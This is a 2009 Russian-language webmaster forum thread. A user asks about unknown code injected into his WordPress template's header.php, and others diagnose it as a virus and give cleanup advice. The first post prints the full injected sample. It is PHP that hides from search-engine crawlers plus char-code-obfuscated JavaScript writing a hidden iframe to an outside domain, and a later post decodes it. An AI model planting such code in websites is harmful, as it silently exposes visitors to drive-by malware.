АРМАДА
Это что за фигня у меня в header.php ?!
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

Бабай
Опытный
Зарегистрирован: 13.02.2008
Сообщений: 442
Обратиться по нику
# Добавлено:Чт Фев 12, 2009 5:18 pmДобавить в избранноеОтветить с цитатой
Код:
<?php /* search_bot111 */ $seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if(!($sebot=="1" && sizeof($_COOKIE)==0)){ ?><script type="text/javascript">function Decode(){var temp="",i,c=0,out=""; var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!102!105!108!97!114!109!111!110!46!105!110!102!111!47!100!111!99!115!47!105!110!102!111!46!104!­116!109!108!34!32!115!116!121!108!101!61!34!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!32!116!111!112!58!48!59!32!108!101!102!116!58!48!59!119!105!100­!116!104!58!49!112!120!59!32!104!101!105!103!104!116!58!49!112!120!59!32!118!105!115!105!98!105!108!105!116!121!58!104!105!100!100!101!110!59!34!62!60!47!105!102!114!97!109!10­1!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();</script><?php } /* search_bot111 */ ?>


- вот это что такое и какого оно у меня делает в файле header.php шаблона вордпресса?! Shocked Shocked Shocked
Стартовал конкурс, призовой фонд 4 000 000 рублей! Выиграй Mercedes C180 CGI BE и другие ценные призы!
Организаторы - сразу 6 партнерок: SmsConvertV3.ru, JinCash.ru, FileCash.su, EnterCash.ru, CenterFile.ru, MaxiLoad.ru

Бабай
Опытный
Зарегистрирован: 13.02.2008
Сообщений: 442
Обратиться по нику
# Добавлено:Чт Фев 12, 2009 5:21 pmОтветить с цитатой
Помогите! Мне страшно! Кто-то мне туда что-то внедрил! Я смотрю на файл шаблона на компе - там нету такого кода. Это на хостинге уже подсунули. Наверное сука-админ или сука-супорт хостинга свое что-то добавляет в наши блоги и делает из нас жертв?!
Стартовал конкурс, призовой фонд 4 000 000 рублей! Выиграй Mercedes C180 CGI BE и другие ценные призы!
Организаторы - сразу 6 партнерок: SmsConvertV3.ru, JinCash.ru, FileCash.su, EnterCash.ru, CenterFile.ru, MaxiLoad.ru

creator123
Гуру
Зарегистрирован: 25.07.2007
Сообщений: 1146
Обратиться по нику
# Добавлено:Чт Фев 12, 2009 5:27 pmОтветить с цитатой
да кто ж тебя знает. Может быть все что угодно.
<----- если понравился пост, жмакай сюды <-----

brantozawr
Опытный
Зарегистрирован: 10.11.2008
Сообщений: 126
Обратиться по нику
# Добавлено:Чт Фев 12, 2009 5:41 pmОтветить с цитатой
Сноси... это вирус

вот раскодированное содержание
Код:

<iframe src="http://filarmon.info/docs/info.html?quot; style="position:absolute; top:0; left:0;width:1px; height:1px; visibility:hidden;"></iframe>



ну а с того адреса у меня на комп пыталосб что-то установиться.

brantozawr
Опытный
Зарегистрирован: 10.11.2008
Сообщений: 126
Обратиться по нику
# Добавлено:Чт Фев 12, 2009 5:53 pmОтветить с цитатой
о, уже ничего по тому адресу нету..

eff
V.I.P.
Зарегистрирован: 20.07.2008
Сообщений: 1640
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 12:02 amОтветить с цитатой
Все, что левое появляется в коде, тем более непонятное - удалять!
Лучшая образовательная партнерка для рунета. Выплаты от 150 руб в любой день по запросу.

Xruman
Гуру
Зарегистрирован: 05.08.2008
Сообщений: 1208
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 12:33 amОтветить с цитатой
стучи админам, пускай разбираются как там тебя поломали, пароли поменяй, плагины проверь, может дырявый какой

icedogas
Гуру
Зарегистрирован: 14.01.2008
Сообщений: 1285
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 1:24 amОтветить с цитатой
ы, обычно в шаблоны горе-дизайнеры суют скрытые линки, а тут на тебе)

brantozawr
Опытный
Зарегистрирован: 10.11.2008
Сообщений: 126
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 8:18 amОтветить с цитатой
Гуглите, гуглите и еще раз гуглите...

хttp://photocritic.org/wordpress-exploit-iframe-gen-c/
хttp://wordpress.org/support/topic/242327

Dark Elf +
V.I.P.
Зарегистрирован: 23.12.2007
Сообщений: 1545
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 9:17 amОтветить с цитатой
Золотое правило - поставил ВП, настроил, ЗАПРЕЩАЙ ЗАПИСЬ ВО ВСЕ ФАЙЛЫ ШАБЛОНА! - ставь права доступа к пхп-файлам - 444 (или 555, для некоторых серваков). Тогда даже если сломают админку, то сильно плохого сделать не смогут.
Про аналогичный случай и как с этим бороться я подробно писал здесь http://darkelfblog.info/archives/34
Мой старый блог про адалт-блоги
Тёмные — это те, кто хочет свободы и независимости, не стремятся к власти, не навязывают своих глупых желаний окружающим.

brush
V.I.P.
Зарегистрирован: 29.09.2005
Сообщений: 2566
Обратиться по нику
# Добавлено:Пт Фев 13, 2009 6:03 pmОтветить с цитатой
Бабай писал(а):
Это что за фигня у меня в header.php ?!

С сегодняшнего дня называем писю - членом и начинаем лечить сифилис ,-))
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры